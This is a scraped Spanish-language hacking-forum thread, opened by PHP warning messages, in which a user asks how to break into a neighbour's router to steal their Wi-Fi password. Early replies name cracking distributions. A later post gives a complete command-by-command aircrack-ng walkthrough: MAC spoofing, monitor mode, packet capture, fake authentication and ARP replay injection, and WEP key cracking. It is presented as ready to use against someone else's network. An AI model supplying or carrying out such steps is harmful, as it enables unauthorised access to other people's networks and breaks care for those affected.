Warning: Illegal string offset 'userid' in [path]/includes/functions.php on line 509

Warning: Illegal string offset 'userid' in [path]/includes/functions.php on line 512

Warning: Illegal string offset 'membergroupids' in [path]/includes/functions.php on line 441

Warning: Illegal string offset 'membergroupids' in [path]/includes/functions.php on line 443

Warning: Illegal string offset 'usergroupid' in [path]/includes/functions.php on line 452

Warning: Illegal string offset 'usergroupid' in [path]/includes/functions.php on line 518

Warning: Illegal string offset 'userid' in [path]/includes/functions.php on line 518

Warning: Illegal string offset 'usergroupid' in [path]/includes/functions.php on line 518

Warning: Illegal string offset 'userid' in [path]/includes/functions.php on line 518

Warning: Illegal string offset 'userid' in [path]/includes/functions.php on line 509

Como hackear un router sin tener internet...
Comunidad Underground Hispana  

Retroceder   Comunidad Underground Hispana > Phreaking, Hacking y Seguridad > HacK GeneraL

Respuesta Crear Nuevo Tema

Compartir en twitter LinkBack Herramientas Desplegado
Antiguo 14-nov-2009, 18:57   #1
DanJeLo
Guest

Amigos
Predeterminado Como hackear un router sin tener internet...

Hola q tal... les explico mi caso... Debido a q en mi propia casa ya no tengo internet... Quisiera poder averiguar como hackear el router de uno de mis vecinos... En sí, quiero sacar la password q tienen para poder ingresar al internet... pero lamentablemente no sé como debido a q no tengo mi propio internet en casa y debo recurrir a cyber's para ello... Es por eso la urgencia de averiguar algun programa u otra forma de la cual no dependa usar internet para poder hackear ese router... Les agradeceria su ayuda.. hasta pronto ^^
Antiguo 14-nov-2009, 19:23   #2
kj
Experto

Amigos 4
Agradecido 319 veces en 219 mensajes.
Predeterminado Re: Como hackear un router sin tener internet...

creo que lo que quieres es algo como wifislax o parecido.

kj

[Solo usuarios registrados pueden ver los links. REGISTRARSE]

kj está desconectado   Responder Citando
Antiguo 14-nov-2009, 20:09   #3
DanJeLo
Guest

Amigos

Pues sep.. algo parecido :x
Antiguo 14-nov-2009, 22:13   #4
Experto

Amigos 0
Agradecido 191 veces en 120 mensajes.

wifislax,wifiway,backtrack,tropix, etc

[Solo usuarios registrados pueden ver los links. REGISTRARSE]

Rudeboy1991 está desconectado   Responder Citando
Antiguo 25-jun-2010, 12:04   #5
Recien llegado

Amigos 0
Agradecido 0 veces en 0 mensajes.
Predeterminado

CON UBUNTU ES FACIL SI CUENTAS CON UNA TARJETA WIFI CON CHIPSET DE ATHEROS LO SIGUE LOS SGUIENTES PASOS Y LISTO A NAVEGAR
//___________verifico si aircrack esta instalado_______

sistema--->administracion--->gestor de paquete signa

buscar="aircrak"

--y si esta instalado en la parte izquierda y derecha encontraremos su nombre y listo seguimos

**********************************ABRIMOS UNA CONSOLA******************************************* **********
-ingresar como rOOt(sudo su)
-das tu contraseña de usuario
-desde aca tambien puedes instalar aircrack-ng ejecutando lo siguiente(pero como root para tener todos los privilegios)
-apt-get install aircrack-ng (enter)+(s/N)=s
-apt-get install macchanger (enter) es una aplicacion para cambiar la MAC si la quieres cambiar sino tambien funciona.

0) en la terminal coloco su-->
luego pide ingresar la clave "la que pusimos en el paso anterior"

1) iwconfig ( para saber que tarjeta de red inalambrica se tiene)

2) ifconfig wlan0 down (si queremos cambiar nuestra MAC la damos de baja)

3) macchanger -m 00:11:2244:55 wlan0 (Con esto cambiamos nuestra MAC pero primero guardas la MAC original para despues restaurarla)

4) ifconfig wlan0 up (levantamos la tarjeta)

5) airmon-ng start wlan0 (para poner en modo monitor la tarjeta de red para que pueda capturar paquetes)
(monitor mode enabled mon0)

mon1
mon2
etc
escoge una

6)airodump-ng -w paketes mon0 (paketes=cualquier nombre solo es el nombre donde se guardan los data que capturamos)
(bueno aqui miramos el listado AP que estan a nuestro alcance escogemos el de mayor potencia)

7)con ctrl+c para parar"ya abiendo descubierto el canal en mi caso el 6 y el BSSID que es la MAC del AP"

8)airodump-ng -w paketes -c 6 --bssid MAC AP mon0

-w (es para que capture datos)

-c (indicar el canal a utilizar)
--bssid (MAC del Access Point al cual atacamos)

**************************ABRIMOS OTRA CONSOLA PARA REPLICAR LA INYECCION DE TRAFICO******************************************* ****************

9) aireplay-ng -1 0 -e paketes -a (MAC AP) -h (MAC de nuestra tarjeta) mon0
(esto es para autenticarnos)

10) aireplay-ng -3 -b (MAC AP) -h (MAC de nuestra tarjeta) mon0
(con esto aceleramos el trafico de datos)
( aqui esperamos que capture por lo minimo 150000 data)

*****************************ABRIMOS OTRA CONSOLA PARA ENCONTRAR LA CLAVE*************************************

11) aircrack-ng -z paketesxx (xx=es la ultima captura este archivo lo encuentras en la carpeta personal)

Y ESPERAMOS QUE DIGA KEY FOUND(******)

POR ULTIMO PARAMOS LA TARJETA QUE ESTABA EN MODO MONITOR CON

airmon-ng stop wlan0
DARIO12345 está desconectado   Responder Citando
Antiguo 25-jun-2010, 12:09   #6
Recien llegado

Amigos 0
Agradecido 0 veces en 0 mensajes.
Predeterminado

Aclaro esto solo sirve cuando el acces point tiene seguridad wep
no sirve para wpa2 es distinto los pasos si los necesitas te los doy aunque soy mas complicados....
DARIO12345 está desconectado   Responder Citando
Respuesta

Herramientas
Desplegado

Normas de Publicación